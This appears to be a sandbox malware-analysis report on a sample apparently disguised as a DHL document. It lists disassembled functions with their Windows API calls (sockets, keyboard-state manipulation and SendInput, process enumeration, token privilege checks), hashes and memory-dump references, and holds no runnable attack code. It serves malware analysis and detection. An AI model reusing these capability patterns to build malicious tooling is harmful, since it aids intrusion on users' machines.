Opcode Fuzzy Hash: d1e5692084510a6632d9a599f75a34f59c38e9b68d431abcba6d3c5e6ce123e1
Instruction Fuzzy Hash: 98512C74A00209EFDF10DF54D881AAE7BB5FB45361F508169FA25DB2A0D730ED85EB90

Function 00F41AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F41AFD
WSAGetLastError.WSOCK32 ref: 00F41B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F41B8A
WSAGetLastError.WSOCK32 ref: 00F41B94

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 066a7b9c8db157b0ef3e733a4881b5b70a821448d24eb152a7a3a52bed60d34c
Instruction ID: ef9c5440be2024d373524b93641a16b5d52079a8f490b1e267747763851dd314
Opcode Fuzzy Hash: 066a7b9c8db157b0ef3e733a4881b5b70a821448d24eb152a7a3a52bed60d34c
Instruction Fuzzy Hash: DF41A5356003006FE720AF24C886F2A7BE5EB84718F54945CF95A9F7D2D772DD829B90

Function 00EFB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8224ef8808430fe59bba9840e4d79c86865e5085f0312101596672fe71b4cb51
Instruction ID: f2a0923208ed1b5a89ad2733334007b45467a6eb33e575f20fd0f4267eab51bf
Opcode Fuzzy Hash: 8224ef8808430fe59bba9840e4d79c86865e5085f0312101596672fe71b4cb51
Instruction Fuzzy Hash: CE410B75A00708AFD7249F38CC41B7ABBE9EB88710F10562EF651EB691E775A9018B80

Function 00F356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F35783
GetLastError.KERNEL32(?,00000000), ref: 00F357A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F357CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F357FA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 1f07e9232670044298e1c4d6c062bd87351dc581b94b1469be51a7a4c63ea8ad
Instruction ID: a34d7c0300889f06d0137acc03a1a6d512e96d7e7603aec3c8c1f01ccb1ddd6f
Opcode Fuzzy Hash: 1f07e9232670044298e1c4d6c062bd87351dc581b94b1469be51a7a4c63ea8ad
Instruction Fuzzy Hash: 04412B35600614DFCB11DF15C545A1EBBE2EF89720F188488E94AAB362CB35FD01EF91

Function 00EFD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00EE82D9,?,00EE82D9,?,00000001,?,?,00000001,00EE82D9,00EE82D9), ref: 00EFD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EFD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EFD9AB
__freea.LIBCMT ref: 00EFD9B4

Part of subcall function 00EF3820: RtlAllocateHeap.NTDLL(00000000,?,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6,?,00EC1129), ref: 00EF3852

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 898d11dee02314d688193653386dc77a51e0a730d8bb5d657f8029c64f9f1eac
Instruction ID: aa4890bde3471bb290ddf4d615aeb5dedca3f72a5005bc9f53721e47fc39bee0
Opcode Fuzzy Hash: 898d11dee02314d688193653386dc77a51e0a730d8bb5d657f8029c64f9f1eac
Instruction Fuzzy Hash: 1331CE72A0020EABDB249FA5DC45EBE7BA6EB80314B050168FD04E6190EBB5CD50DBA0

Function 00F552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00F55352
GetWindowLongW.USER32(?,000000F0), ref: 00F55375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F55382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F553A8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 6d8b5f13a76feb67bd9a179b57888003ac03ec183858cf4a8fa6733d413b4125
Instruction ID: 6af2011fd1c019fc58708f3a1500e12a8506b42a5024af45ca0e7bc5dd38b3b3
Opcode Fuzzy Hash: 6d8b5f13a76feb67bd9a179b57888003ac03ec183858cf4a8fa6733d413b4125
Instruction Fuzzy Hash: 7D31D231E55A0CEFEB309F54CC25BE83763AB05BA2F584012FF19961E1C7B19988BB41

Function 00F2AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F2ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F2AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F2AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F2ACC6

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 195fb28ee61db7c494647cec6c46e6ef2e738afbb7ff5d6aaa4770d5ae8da958
Instruction ID: 8799ab9be8c9cd091168f3ec01a4b80701bd6191d60d6c3c4f7c880d72610d01
Opcode Fuzzy Hash: 195fb28ee61db7c494647cec6c46e6ef2e738afbb7ff5d6aaa4770d5ae8da958
Instruction Fuzzy Hash: 76310830E84728AFFF35CB65EC047FE7BA5AB85320F04421AE485561D1D379C985A793

Function 00F57674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F5769A
GetWindowRect.USER32(?,?), ref: 00F57710
PtInRect.USER32(?,?,00F58B89), ref: 00F57720
MessageBeep.USER32(00000000), ref: 00F5778C

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 95a3212260d6cc9f6e5e7a6d3201d0c2bc070afeae55e64af84e3253f0d877a9
Instruction ID: d95efcace1ba26add877ee0c00abbf9ea889de6cf989acd66d5bc7cc7ab991c0
Opcode Fuzzy Hash: 95a3212260d6cc9f6e5e7a6d3201d0c2bc070afeae55e64af84e3253f0d877a9
Instruction Fuzzy Hash: 8741B035A05319DFCB11EF58F884FA9BBF0FB49312F1540A9EA158B261C330A949EF90

Function 00F516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F516EB

Part of subcall function 00F23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F23A57
Part of subcall function 00F23A3D: GetCurrentThreadId.KERNEL32 ref: 00F23A5E
Part of subcall function 00F23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F225B3), ref: 00F23A65

GetCaretPos.USER32(?), ref: 00F516FF
ClientToScreen.USER32(00000000,?), ref: 00F5174C
GetForegroundWindow.USER32 ref: 00F51752

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 4d6240b2820b0505fd8f921c12bfb577fa174c116ac61fe8ee60dae3362e2c9b
Instruction ID: f401beb6e1ec264077476472f90d40f43fbe82b3a4b0d36e2056be4095dade04
Opcode Fuzzy Hash: 4d6240b2820b0505fd8f921c12bfb577fa174c116ac61fe8ee60dae3362e2c9b
Instruction Fuzzy Hash: 86316175D00249AFC700EFA9D981DAEBBF9EF48304B5480AEE515E7211D735AE46CFA0

Function 00F2D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F2D501
Process32FirstW.KERNEL32(00000000,?), ref: 00F2D50F
Process32NextW.KERNEL32(00000000,?), ref: 00F2D52F
CloseHandle.KERNEL32(00000000), ref: 00F2D5DC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 0b2c843acc4b3c8af790162d092c32eabed060691f2474dcfb514db4b46fedef
Instruction ID: 2f2904af8aa2de80a7199241fadd44fc7ac37bc071a6a765763937eec8c39ae5
Opcode Fuzzy Hash: 0b2c843acc4b3c8af790162d092c32eabed060691f2474dcfb514db4b46fedef
Instruction Fuzzy Hash: 6D318D720083049FD304EF54D886EAFBBE8EF99354F14092DF582931A2EB719945DBA2

Function 00F58FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

GetCursorPos.USER32(?), ref: 00F59001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F17711,?,?,?,?,?), ref: 00F59016
GetCursorPos.USER32(?), ref: 00F5905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F17711,?,?,?), ref: 00F59094

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: df7e5b9807c3d581bda41d4b0a9b06fb8509986264d4e2a073713ee248525ec7
Instruction ID: 8a1305f6816857a832ae2b5f2b9b3ab8f21965cbe0f82a561463a4ac7b768b3c
Opcode Fuzzy Hash: df7e5b9807c3d581bda41d4b0a9b06fb8509986264d4e2a073713ee248525ec7
Instruction Fuzzy Hash: 5421B131600118EFDB298FA4CC58EEB3BB9FB49362F044465FA05472A1C3719950FB60

Function 00F2D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F5CB68), ref: 00F2D2FB
GetLastError.KERNEL32 ref: 00F2D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F2D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F5CB68), ref: 00F2D376

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 3ca924d6766f97c46d28313880b4ef274479f95b1675b651eb059ad6f9999b60
Instruction ID: be90b9a092a8c782ae676bb78a3f014b9df42a10f512320c4ea80e5956f2e83d
Opcode Fuzzy Hash: 3ca924d6766f97c46d28313880b4ef274479f95b1675b651eb059ad6f9999b60
Instruction Fuzzy Hash: 5A21D1719083119F8300DF28D8859AE77E4EF56328F104A1DF499D32A1D731DD4ADB93

Function 00F21571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F2102A
Part of subcall function 00F21014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F21036
Part of subcall function 00F21014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F21045
Part of subcall function 00F21014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2104C
Part of subcall function 00F21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F21062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F215BE
_memcmp.LIBVCRUNTIME ref: 00F215E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F21617
HeapFree.KERNEL32(00000000), ref: 00F2161E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 7164400f47eedc64820944662a9e8b79bd70d72884fa7ab8219caaab42ca26a8
Instruction ID: 70c243cc0aae0d2d6925a909dea0446bca719136b2620ed04ccf7b9fa76e1242
Opcode Fuzzy Hash: 7164400f47eedc64820944662a9e8b79bd70d72884fa7ab8219caaab42ca26a8
Instruction Fuzzy Hash: BF218C31E00218EFDF10DFA4D945BEEBBB8FF54355F184499E441AB241E730AA05EBA4

Function 00F52782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00F5280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F52824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F52832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F52840

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ddefb4b7b3871c55056ed3be2fc00e2f4675dc6048ed479f118806405e696d08
Instruction ID: 1ab82f2636bc8a209ddef73f4e7e9d6e1190b9ec47efcb17acb65f2bdb2d53cd
Opcode Fuzzy Hash: ddefb4b7b3871c55056ed3be2fc00e2f4675dc6048ed479f118806405e696d08
Instruction Fuzzy Hash: 9021F431604610AFD714DB24CC45F6A7B95EF46326F148258F9268B2D2CB75FC46D7D0

Function 00F278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F2790A,?,000000FF,?,00F28754,00000000,?,0000001C,?,?), ref: 00F28D8C
Part of subcall function 00F28D7D: lstrcpyW.KERNEL32(00000000,?,?,00F2790A,?,000000FF,?,00F28754,00000000,?,0000001C,?,?,00000000), ref: 00F28DB2
Part of subcall function 00F28D7D: lstrcmpiW.KERNEL32(00000000,?,00F2790A,?,000000FF,?,00F28754,00000000,?,0000001C,?,?), ref: 00F28DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F28754,00000000,?,0000001C,?,?,00000000), ref: 00F27923
lstrcpyW.KERNEL32(00000000,?,?,00F28754,00000000,?,0000001C,?,?,00000000), ref: 00F27949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00F28754,00000000,?,0000001C,?,?,00000000), ref: 00F27984

Strings

cdecl, xrefs: 00F2797B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d2b328db13e1b5ac75aa4f4dbf1ab1b153e80588f60bd1e640af73277eec84db
Instruction ID: a062025b85da9e8593421b550e6b38ae4aa21cd0467da1ffa0e27f5c8dc4bcab
Opcode Fuzzy Hash: d2b328db13e1b5ac75aa4f4dbf1ab1b153e80588f60bd1e640af73277eec84db
Instruction Fuzzy Hash: 2E11D63A200315AFCB15AF34EC45E7A77A5FF453A0B50402AF946CB3A4EB319851E791

Function 00F57CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00F57D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F57D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F57D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F3B7AD,00000000), ref: 00F57D6B

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 72f6e86518ad4cdb7ec8f6e4fdcc9c83d72c9670eea83d9918ff3ec08c60f3b3
Instruction ID: 53140c64e6803adabe83ea8ddd31616de8ede14eae854ccce511c3ee66e9988f
Opcode Fuzzy Hash: 72f6e86518ad4cdb7ec8f6e4fdcc9c83d72c9670eea83d9918ff3ec08c60f3b3
Instruction Fuzzy Hash: 9211AE32504719AFCB10AF28DC04A663BA5BF45372B154325FE3AD72E0E7319954EB80

Function 00F55660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00F556BB
_wcslen.LIBCMT ref: 00F556CD
_wcslen.LIBCMT ref: 00F556D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F55816

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: ace15244038937d051569d9ed10a4d746adbbaa0370ba42974055eadcc4f13f0
Instruction ID: 5bbdf72b72df34f47860858fc441be1766538b4f1939055bd0d1b4c967163cc0
Opcode Fuzzy Hash: ace15244038937d051569d9ed10a4d746adbbaa0370ba42974055eadcc4f13f0
Instruction Fuzzy Hash: 5C11A271A0060996DF20DF619C95AEE77BCEF11B62B104026FF15A6081E774CA88EBA0

Function 00EF1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b5f1d79aaec2836ad344ff24505f96c2c114fc32be652e3d815421969c57c4
